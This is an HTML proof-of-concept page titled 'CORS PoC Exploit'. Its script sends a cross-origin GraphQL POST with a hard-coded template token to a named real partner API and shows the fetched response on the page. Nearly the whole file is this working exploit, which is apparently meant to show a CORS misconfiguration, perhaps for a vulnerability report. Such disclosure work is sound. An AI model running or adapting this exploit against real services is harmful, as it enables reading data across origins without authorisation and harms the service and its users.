<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>CORS PoC Exploit</title>
  <style>
    body {
      background-color: #121212;
      color: white;
      font-family: Arial, sans-serif;
      text-align: center;
      margin-top: 50px;
    }

    a {
      color: #4fa3ff;
      text-decoration: none;
    }

    button {
      background-color: #333;
      color: white;
      border: 1px solid #888;
      padding: 10px 20px;
      cursor: pointer;
      margin-top: 10px;
    }

    textarea {
      background-color: #1e1e2f;
      color: #ccc;
      border: 1px solid #888;
      width: 75%;
      height: 250px;
      margin-top: 20px;
      resize: none;
      font-family: monospace;
      font-size: 14px;
    }

    hr {
      border: 1px solid #888;
      width: 80%;
    }
  </style>
</head>
<body>
  <h2>CORS POC Exploit</h2>
  <h3>created by dima_bolich</h3>

  <button onclick="exploitCORS()">Fetch from the target!</button>
  <hr>
  <textarea id="fetchedResource" placeholder="Click on the button to fetch resource!"></textarea>

<script>
function exploitCORS() {
  fetch("https://partners.marketingtools.apple.com/api/graphql", {
    method: "POST",
    headers: {
      "Content-Type": "application/json"
    },
    body: JSON.stringify({
      "query":"query formTemplateVipQuery(\n  $key: String!\n) {\n  templateToken(key: $key) {\n    ...VIPPartnerPage_templateToken\n  }\n}\n\nfragment NewSubmission_version on TemplateVersion {\n  id\n  name\n  description\n  fields {\n    id\n    key\n    kind\n    name\n    parentId\n    data\n    displayOrder\n  }\n}\n\nfragment VIPPartnerPage_templateToken on TemplateToken {\n  key\n  template {\n    id\n    name\n    type\n    slug\n    tag {\n      name\n    }\n    version {\n      id\n      name\n      description\n      ...NewSubmission_version\n    }\n  }\n}\n","variables":{"key":"e6b57a081b7dbd02e1290eda06009687caf787bfcd151f801e37acf03f71e0c5"
},"x-connect-team-id":"com.apple.bedrock.affiliate-registration"
    })
  })
  .then(r => r.text())
  .then(data => {
    document.getElementById("fetchedResource").value = data;
  })
  .catch(err => {
    document.getElementById("fetchedResource").value = "Error: " + err;
  });
}
</script>

</body>
</html>
